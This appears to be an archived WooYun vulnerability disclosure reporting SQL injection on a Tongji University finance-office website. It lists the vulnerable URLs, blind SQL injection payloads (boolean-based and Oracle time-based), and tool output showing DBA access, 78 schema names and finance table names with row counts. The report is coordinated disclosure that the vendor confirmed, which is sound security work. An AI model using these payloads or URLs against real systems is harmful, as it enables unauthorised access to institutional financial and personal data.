当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162438

漏洞标题:同济大学某站SQL注入

相关厂商:同济大学

漏洞作者: 40huo

提交时间:2015-12-18 17:40

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-18: 细节已通知厂商并且等待厂商处理中
2015-12-19: 厂商已经确认,细节仅向厂商公开
2015-12-29: 细节向核心白帽子及相关领域专家公开
2016-01-08: 细节向普通白帽子公开
2016-01-18: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

同济大学某站SQL注入,大量信息泄漏

详细说明:

注入点1:http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?qry=qwe
类型:

Parameter: qry (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: qry=-2054' OR 5656=5656 AND 'PodT' LIKE 'PodT
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: qry=qwe' AND 5341=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(74)||CHR(114)||CHR(105),5) AND 'OeaF' LIKE 'OeaF


其余注入点:
http://cwc.tongji.edu.cn/WFManager/common/newsList.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/common/newsList2.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/common/newsList4.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/common/newsList5.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList2.jsp?nType=1
http://cwc.tongji.edu.cn/wingsoft/common/newsList.jsp?nType=1
http://cwc.tongji.edu.cn/wingsoft/common/newsList2.jsp?nType=1
http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?qry=%27%
http://cwc.tongji.edu.cn/WFManager/common/a.jsp?qry=%27

漏洞证明:

dba权限:

web application technology: JSP
back-end DBMS: Oracle
[INFO] testing if current user is DBA
current user is DBA:    True


涉及78个数据库:

web application technology: JSP
back-end DBMS: Oracle
available databases [78]:
[*] APEX_030200
[*] APPQOSSYS
[*] BUDGET_DRIVE
[*] CAMPUSCARD
[*] CJ
[*] CJ2
[*] CJCS
[*] CJSZCS
[*] CTXSYS
[*] CW_DEF
[*] CWBS
[*] CWBS_TMP
[*] CWBX
[*] DBSNMP
[*] EXFSYS
[*] FD
[*] FDSF
[*] FDSF1
[*] FDSFCX
[*] FDYS
[*] FLOWS_FILES
[*] GJ
[*] GZ1
[*] GZ2
[*] GZ3
[*] GZ4
[*] GZ5
[*] GZZ1
[*] GZZ3
[*] GZZ4
[*] MDSYS
[*] MSGSERVICE
[*] NEWGZ0
[*] NEWZXJ1
[*] NEWZXJ2
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PAY
[*] PAY_TEST
[*] SCOTT
[*] SERVICEFLAT
[*] SF_DEF
[*] SF_USERS
[*] SFHQ
[*] SFXX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WEBFEE
[*] WEBFEE1
[*] WEBFEE_CX
[*] WEBFEE_YJS
[*] WF0
[*] WF1
[*] WF3
[*] WF_CA
[*] WF_PAY
[*] WF_PAY_NEW
[*] WF_PRETICKET
[*] WF_PRETICKET_NEW
[*] WF_PZ
[*] WF_TIANYI
[*] WF_TICKET
[*] WF_YB
[*] WING
[*] WMSYS
[*] XDB
[*] XSSF
[*] XSSF1
[*] XSSF2
[*] XSSFCX1
[*] ZXJ1
[*] ZXJ2
[*] ZZGZ


仅当前数据库有104张表,大量敏感信息泄漏:

web application technology: JSP
back-end DBMS: Oracle
Database: CWBS
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| REWARDS            | 2286325 |
| DBANKLOG           | 749052  |银行记录?
| USERROLE           | 663696  |用户信息?
| DBANKBILLS_BK      | 570737  |账单?
| LASTBILL           | 266342  |
| USERINFO           | 241609  |
| REWARDFORM         | 203574  |
| USERINFO_BACK_MSX  | 166390  |
| DBANKBILLS         | 160859  |
| REWARDMEMBER       | 72383   |
| USERINFO_BAK       | 46403   |
| USERB              | 32419   |
| DBANKCODETABLE     | 24872   |
| PROJQRYAPPLY       | 18596   |
| PROJQRYLIST        | 15464   |
| USERKU             | 13154   |
| DBANKBILLAUTH      | 10778   |
| SYSLOG             | 10733   |
| USERC              | 4598    |
| HIDEPRJLIST        | 4525    |
| LASTREWARDTEAM     | 4125    |
| BOARD              | 3133    |
| TOPICINFO          | 1265    |
| NEWSINFO           | 515     |
| SALARY_STRUCTURE   | 405     |
| DEPTINFO2          | 361     |
| COMMUNIONCONTENT_1 | 212     |
| MAILCONTENT        | 196     |
| CWFILEITEM         | 188     |
| CWFILEITEM2        | 175     |
| DBANKPARAMS        | 54      |
| ROLEFUNCS          | 51      |
| DEPTINFO1          | 37      |
| DBANKAUTHORITY     | 24      |
| FEE_STRUCTURE      | 24      |
| PARAMS             | 20      |
| FUNCTYPEINFO       | 19      |
| BBSADMIN           | 18      |
| DBANKUSERS         | 15      |
| LSTYLE             | 14      |
| LSTYLE3            | 14      |
| DBINFO             | 13      |
| USERDMPSCHEMA      | 10      |
| INCOMEITEMINFO     | 9       |
| NOCASHQRYFIELDSET  | 7       |
| REWARDDEF          | 7       |
| ROLEINFO           | 7       |
| FEEQRYSET          | 6       |
| INCOMEINFO         | 6       |
| MENUINFO           | 6       |
| GZPUBINFO          | 5       |
| LSTYLE4            | 5       |
| XMQRYSET           | 5       |
| CWFILEINFO         | 4       |
| DKSET              | 3       |
| INCOMETYPE         | 3       |
| INSTANCEFORMAT     | 2       |
| PROJ_QRY           | 2       |
| COMMUNION          | 1       |
| COMMUNIONDEF       | 1       |
| CWINFOFIELD        | 1       |
| CWINFOKEYFIELD     | 1       |
| CWINFOMAINTAIN     | 1       |
| FEESUMQRYSET       | 1       |
| INCOMESUMINFO      | 1       |
| INCOMESUMITEMINFO  | 1       |
| INCOMETEAMINFO     | 1       |
| INCOMETEAMITEMINFO | 1       |
| INTRODUCE          | 1       |
| LYBK               | 1       |
| NOCASHQRYSET       | 1       |
| PZD_QRY            | 1       |
| REPORTINFO         | 1       |
| REPORTINSTANCE     | 1       |
| ROLEFUNCCONDS      | 1       |
| T1                 | 1       |
+--------------------+---------+


财务信息太敏感,还是不继续看了,就这样吧,别的70来个数据库还没看呢。

修复方案:

财务处的网站要好好弄啊
这样不行。。。

版权声明:转载请注明来源 40huo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-19 14:05

厂商回复:

感谢提醒!

最新状态:

暂无